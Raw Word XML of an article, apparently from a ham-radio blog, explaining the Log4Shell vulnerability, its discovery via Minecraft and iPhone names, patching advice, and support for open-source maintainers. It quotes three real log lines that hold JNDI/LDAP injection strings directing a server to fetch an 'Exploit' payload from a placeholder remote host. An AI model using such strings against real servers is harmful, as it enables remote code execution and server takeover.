    <w:p w14:paraId="6108264B" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E356182" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">The above string similar to a test generated by the </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Huntress Labs Log4j/Log4Shell vulnerability tester</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">.  This is not showing how to exploit servers, anything that’s a secret, or anything that’s not already published online.  In fact, the Huntress tool is </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>open source on GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.  If a similar string is entered into a web application and the Huntress Labs server subsequently sees a request with that unique identifier, it can be assumed the web application tested is vulnerable.  A negative test does not necessarily mean the application is not vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA8553" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">There is a one-liner test that can be run from the Command Line (CLI) on a Windows or Linux system called </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Log4j Checker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>. Note, however, the checker is beta code and the maintainer is not committed to maintaining the script. There is a post looking to transfer ownership as it took too much of their time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009BDD5" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">The Huntress Labs tester is benign but the bad guys won’t be so nice.  They can craft a string having Log4j reach out to any external resource, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>BadGuyMaliciousHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">[dot]com, download and execute any payload the bag guys wish, effectively </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>pwning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> the server (pronounced “owning”).  Not everything that’s sent back to a server will be bad but there is a very high probability it will be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C477CF" w14:textId="116C2B11" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">Real log entries trying to exploit Log4Shell three different ways on my server are shown below.  No, my web servers are not vulnerable but that doesn’t stop individuals from trying to find out.  All requests originate from the same IP attempting to have the “Exploit” payload downloaded and executed on my server from another </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:lastRenderedPageBreak/>
        <w:t>remote server.  Relevant IPs are scrubbed, client is replaced with 111.222.333.444, remote server replaced with 555.666.777.888:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBCE431" w14:textId="77777777" w:rsidR="00475888" w:rsidRPr="007A6C3F" w:rsidRDefault="00475888" w:rsidP="00FF0FF5"/>
    <w:p w14:paraId="4C351B89" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>111.222.333.444 - - [22/Dec/2021:17:22:09 +0000] "GET /${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">://555.666.777.888:1389/Exploit} HTTP/1.1" 404 5200 "-" "Mozilla/5.0 (platform; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rv:geckoversion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>) Gecko/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>geckotrail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Firefox/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E40B8" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>111.222.333.444 - - [22/Dec/2021:17:22:11 +0000] "GET / HTTP/1.1" 200 5259 "-" "${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>://555.666.777.888:1389/Exploit}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5A68B" w14:textId="528B34C5" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>111.222.333.444 - - [22/Dec/2021:17:22:16 +0000] "GET /?s=${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">://555.666.777.888:1389/Exploit} HTTP/1.1" 200 5259 "-" "Mozilla/5.0 (platform; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rv:geckoversion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>) Gecko/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>geckotrail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Firefox/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417444E7" w14:textId="77777777" w:rsidR="00475888" w:rsidRPr="007A6C3F" w:rsidRDefault="00475888" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC2D1D9" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253007872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79837384" wp14:editId="42F38D95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2266950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3670935" cy="2094865"/>
                <wp:effectExtent l="0" t="0" r="5715" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3" name="Group 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3670935" cy="2094865"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3670935" cy="2094865"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="6" name="Picture 6"/>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670935" cy="1647825"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="22" name="Text Box 22"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1704975"/>
                            <a:ext cx="3670935" cy="389890"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5FFD3757" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00BD19C7" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                              <w:pPr>
                                <w:pStyle w:val="Caption"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00E92F1E">
                                <w:t>Trivial exploit receives a trivially drawn logo in MS Paint</w:t>
                              </w:r>
                              <w:r>
                                <w:br/>
                              </w:r>
                              <w:r w:rsidRPr="00E92F1E">
                                <w:t>(Kevin Beaumont @GossiTheDog)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9837384" id="Group 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:178.5pt;margin-top:.95pt;width:289.05pt;height:164.95pt;z-index:253007872" coordsize="36709,209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7" type="#_x0000_t75" style="position:absolute;width:36709;height:16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">
                  <v:imagedata r:id="rId24" o:title=""/>
                </v:shape>
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
                <v:shape id="Text Box 22" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;top:17049;width:36709;height:3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" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5FFD3757" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00BD19C7" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                        <w:pPr>
                          <w:pStyle w:val="Caption"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00E92F1E">
                          <w:t>Trivial exploit receives a trivially drawn logo in MS Paint</w:t>
                        </w:r>
                        <w:r>
                          <w:br/>
                        </w:r>
                        <w:r w:rsidRPr="00E92F1E">
                          <w:t>(Kevin Beaumont @GossiTheDog)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">Servers can be attacked using a single line of text sent through a web application form, instant message, URL, chat window, or, as some clever minded individuals surmised, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>name of an iPhone</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> triggered the exploit as well.  This confirmed Apple’s servers were vulnerable to attack.  The device name of an iPhone was changed to a string which triggered the exploit. When the iPhone device registered and communicated with Apple’s servers, Log4j saw the string and acted upon it. Luckily the individual composed a benign payload to have Apple’s infrastructure induce a DNS request – which is something done all the time like when browsing the Internet.  If that individual saw in logs, on a server he controlled, a DNS request for the hostname originating from Apple IP addresses, it’s was then known Apple’s servers were vulnerable.  If there was no DNS request, could be assumed not vulnerable or the exploit was already patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF96A3D" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Once a bad guy obtains access to a vulnerable system, they can do anything the user or administrator can do.  Add programs, remove programs, delete files, install services to mine cryptocurrency, create botnets, send spam, and use the server in other illegal activities such as host ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6DA277" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">Log4j needs updated immediately to log4j-2.16.0 or later on any system running an earlier version.  Make sure Java is updated while you’re at it.  Though patches have been released, the industry is at the mercy of vendors to release updates.  A list is actively being updated of </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>known vulnerable applications, services, appliances, and other devices</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">.  There are A LOT.  If devices are found vulnerable but no updates are available, remediation steps should be taken like shutting down, replacing, or moving to an isolated network as to not be exposed to the Internet or other devices on the Local Area Network (LAN).  The Canadian government shutdown nearly 4,000 websites </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>in response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.  Few actions are more drastic as shutting down government websites and services.  Shutting down your services and applications should not be out of the realm of possibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE9641" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">As the cliché goes: this was </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>a feature</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>, not a bug in Log4j.  Users wanted parsing as part of the plugin but that feature was poorly implemented.  Java is the #1 development platform and runs on billions of devices according to the website.  Anything running Java is potentially vulnerable.  Big named companies and applications were found to be vulnerable in addition to Apple: Amazon, Tesla, Apache web servers, video game servers, Elastic Search, Twitter and no doubt thousands more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D73273" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">This is not to minimize the impact of a random server setup in a closet that’s been forgotten about.  They are just as vulnerable and easily exploited.  As are the random Internet of Things (IoT) companies who released cheap Java based video cameras, doorbells, door lock controllers, internet connected audio devices, network </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:lastRenderedPageBreak/>
        <w:t>devices, or digital video recorder devices - again, to name a very new.  There they sit with ports forwarded from the open Internet, very likely opening a home network to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B742C3" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253008896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="148B6612" wp14:editId="42D78B51">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4091940" cy="2315845"/>
                <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="23" name="Group 23"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4091940" cy="2315845"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4091940" cy="2315845"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="25" name="Picture 25"/>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091940" cy="2000250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="29" name="Text Box 29"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2057400"/>
                            <a:ext cx="4091940" cy="258445"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="287F3517" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00D66736" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                              <w:pPr>
                                <w:pStyle w:val="Caption"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t>Hacking a Minecraft server with Log4Shell (Huntress)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48B6612" id="Group 23" o:spid="_x0000_s1029" style="position:absolute;margin-left:0;margin-top:.95pt;width:322.2pt;height:182.35pt;z-index:253008896;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="40919,231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">
                <v:shape id="Picture 25" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;width:40919;height:20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">
                  <v:imagedata r:id="rId30" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 29" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;top:20574;width:40919;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" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="287F3517" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00D66736" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                        <w:pPr>
                          <w:pStyle w:val="Caption"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t>Hacking a Minecraft server with Log4Shell (Huntress)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">To say gamers aren’t good for anything, this exploit was first found in the very popular game called </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Minecraft</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.  Someone was looking for ways to exploit Minecraft game servers.  Using a malicious string in a Minecraft chat box, they were able to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>” the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22891CA4" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Sad part in all of this: billion-dollar companies and technologies are relying on open-source programs maintained by volunteers.  These volunteers bust their butts (for free) to fix this issue so that enterprises whom rely on this technology can continue to operate.  If you have a commercial enterprise, it’s imperative companies should be kicking in, providing support or substantial donations to these projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C8557" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Same is true for a favorite ham radio implementation.  Provide time in testing, talent in support or quashing bugs, or treasure in donating to the project to keep the lights on.  An obvious example to me is ham radio digital hotspots.  Yes, you might have purchased a board or complete kit from a vendor or someone selling devices.  Individuals who wrote the underlying code (</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:anchor="1438" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>G4KLX</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>) and package it so it works as well as it does (</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Pi-STAR</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>) do not see a penny from that sale.  Please be generous to the projects that not only make ham radio enjoyable or advance ham radio technology, but ones you use for free in any capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E341234" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">To that point, I found a reference to </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ham-Pi containing a vulnerable Log4j version</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.  Exposure should be minimal only being accessible on Local Area Network (LAN).  In theory, the LAN should have less attack vectors.  I’m sure someone has forwarded SSH, VNC, or some other port to Ham-Pi from the Internet, opening their network and devices to external attacks.  Dave is going to release an update to Ham-Pi as his time allows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAB2630" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>As for other projects, it’s not any different across the industry, hams will be all in on a project and let the project get stale, not receiving updates.  If a project is open source, searching the code for Log4j as a dependency is a sign that application is vulnerable.  If the Log4j dependency can be updated externally to the latest version and the code re-compiled, that would mitigate the exploit.  However, if there are only downloadable compiled binaries available – there’s no telling if it is or is not vulnerable to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E4E7D0" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>This vulnerability checked off a lot of boxes that most overlook or try to argue are non-issues.  Those being: this poorly written feature has been vulnerable to exploit since 2013.  This, again, proves vulnerabilities will exist for many years before someone finds them. Most will say the app is “secure.”  Nothing is entirely secure, vulnerabilities just haven’t been found and aren’t known yet.  Another is vulnerabilities exist only in web browsers, to say not in operating systems or other applications.  While it’s true that most are disclosed because everything uses a web browser today, more eyes are looking at browsers for exploits. This is a case where it is not the web browser but a component of the Java logging framework used on backend systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069DF174" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253009920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="620886E7" wp14:editId="05708D5E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2890520</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3705225" cy="3275965"/>
                <wp:effectExtent l="0" t="0" r="9525" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="30" name="Group 30"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
